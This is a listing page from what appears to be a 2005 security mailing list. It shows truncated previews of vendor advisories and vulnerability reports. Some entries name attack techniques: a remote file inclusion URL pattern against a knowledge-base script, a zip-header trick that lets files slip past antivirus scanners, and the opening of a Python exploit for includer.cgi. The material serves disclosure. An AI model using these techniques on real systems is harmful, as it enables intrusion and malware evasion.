|
Colapse all |
Post message
SUSE Security Announcement: openslp (SUSE-SA:2005:015) 2005-03-14 krahmer suse de (Sebastian Krahmer) [CLA-2005:933] Conectiva Security Announcement - gaim 2005-03-14 Conectiva Updates (secure conectiva com br) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - ------------------------------------------------------------------------ -- PACKAGE : gaim SUMMARY : Fixes for gaim's vulnerabiliti [ more ] [ reply ] [SECURITY] [DSA 662-2] New squirrelmail package fixes regression 2005-03-14 joey infodrom org (Martin Schulze) KnowledgeBase 2005-03-12 Francisco Alisson (dominusvis click21 com br) Remote File Inclusion KnowledgeBase Vendor: www.activecampaign.com/kb/ Well, inside the index.php file we can see: if ($page == ""){ $page = "startup"; } @include("$page.php"); ?> After I tested some sites with kb I got file inclusion: http://www.site.com/kb/index.php?page=http://[file] Dom [ more ] [ reply ] Av issues 2005-03-12 Bipin Gautam (visitbipin hotmail com) In-Reply-To: <20050311203150.17236.qmail (at) www.securityfocus (dot) com [email concealed]> In Local file header if you modify "general purpose bit flag" 7th & 8'th byte of a zip archive with \x2f ie: "\" F-port, Kaspersky, Mcafee, Norman, Sybari, Symantec seem to skip the file marking it as clean!!! This was discovered durin [ more ] [ reply ] Virginity Security Advisory 2005-001 : Hola CMS - File destruction and System access 2005-03-12 Virginity Security (advisory05 konfiweb de) RE: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-11 Daniel Cross (dcross woosh co nz) Thats intersting. I haven't tested my 2k3 box yet, but have tested against XP SP1 (Pentium 4 2.6G). I didn't get the 100% load on the CPU that others have reported, but did get symptoms. I tried ports 135, 139 and 445. When I tried ports 135 and 139 I saw the average CPU load on the target machine a [ more ] [ reply ] [SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB 2005-03-12 SecurityReason (sp3x securityreason com) -=[ SecurityReason-2005-SRA#02 ]=- -=[ Mass Full Path Disclosure in paFileDB ]=- Author: sp3x Date: 12 March 2005 Affected software : =================== paFileDB version : =>3.1 Description : ============= paFileDB is designed to allow webmasters have a database of files for download on thei [ more ] [ reply ] Mysql CREATE FUNCTION libc arbitrary code execution. 2005-03-10 Stefano Di Paola (stefano dipaola wisec it) 3. Mysql CREATE FUNCTION libc arbitrary code execution. Author: Stefano Di Paola Vulnerable: Mysql <= 4.0.23, 4.1.10 Type of Vulnerability: Local/Remote - input validation Tested On : Mandrake 10.1 /Debian Sarge Vendor Status: Notified on March 2005 -- Description If an authenticated user has I [ more ] [ reply ] summercon looking for speakers 2005-03-12 louis (trumpbour gmail com) CALL FOR PAPERS: Speak at SummerCon 2005 http://www.summercon.org/rfp SUMMERCON XVII Annual Conference on Computer Security June 3-5, 2005 Austin, TX (USA) Program Committee Chair: Mark Trumpbour Organized by: The folks at SummerCon (http://www.summercon.org) Theme for 2005: Tools of the Trade T [ more ] [ reply ] Mysql CREATE FUNCTION mysql.func table arbitrary library injection 2005-03-10 Stefano Di Paola (stefano dipaola wisec it) 2. Mysql CREATE FUNCTION mysql.func table arbitrary library injection Author: Stefano Di Paola Vulnerable: Mysql <= 4.0.23, 4.1.10 Type of Vulnerability: Local/Remote Privileges Escalation - input validation Tested On : Mandrake 10.1 /Debian Sarge Vendor Status: Notified on March 2005 -- Descr [ more ] [ reply ] [badroot.org] The Includer remote commands execution exploit 2005-03-11 mozako (mozako mybox it) [badroot security] includer.cgi remote commands execution vulnerability remote exploit. #!/usr/bin/python # The Includer remote commands execution exploit v. 2 # Exploit by: mozako - mozako[at]mybox[dot]it # Vuln. discovered by: Francisco Alisson # # (C) 2005 - badroot security # http://www.badroo [ more ] [ reply ] [badroot.org] The Includer remote commands execution exploit 2005-03-12 Federico Ozak (mozako mybox it) [badroot security] includer.cgi remote commands execution vulnerability remote exploit. #!/usr/bin/python # The Includer remote commands execution exploit v. 2 # Exploit by: mozako - mozako[at]mybox[dot]it # Vuln. discovered by: Francisco Alisson # # (C) 2005 - badroot security # http://www.badro [ more ] [ reply ] PhotoPost PHP 5.0 RC3, and later, multiple vulnerabilities 2005-03-11 Igor Franchuk (sprog online ru) [SECURITYREASON.COM] SQL injection and XSS in paFileDB 2005-03-12 SecurityReason (sp3x securityreason com) -=[ SecurityReason-2005-SRA#03 ]=- -=[ SQL injection and XSS in paFileDB ]=- Author: sp3x Date: 12 March 2005 Affected software : =================== paFileDB version : =>3.1 Description : ============= paFileDB is designed to allow webmasters have a database of files for download on their si [ more ] [ reply ] Re: Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability. 2005-03-11 secure symantec com In-Reply-To: <20050310112622.4458.qmail (at) www.securityfocus (dot) com [email concealed]> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >Date: 10 Mar 2005 11:26:22 -0000 >From: Bipin Gautam <visitbipin (at) hotmail (dot) com [email concealed]> >To: bugtraq (at) securityfocus (dot) com [email concealed] >Subject: Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability. > > > >Mul [ more ] [ reply ] [SECURITYREASON.COM][phpBB 2.0.13 SQL error in session cXIb8O3.8] 2005-03-12 Maksymilian Arciemowicz (max jestsuper pl) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.13 SQL error in session cXIb8O3.8] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 10.3.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board [ more ] [ reply ] |
|
Privacy Statement |
________________________________________________________________________
______
SUSE Security Announcement
Package: openslp
Announcement-ID: SUSE-SA:2005:015
Date: Mon, March
[ more ] [ reply ]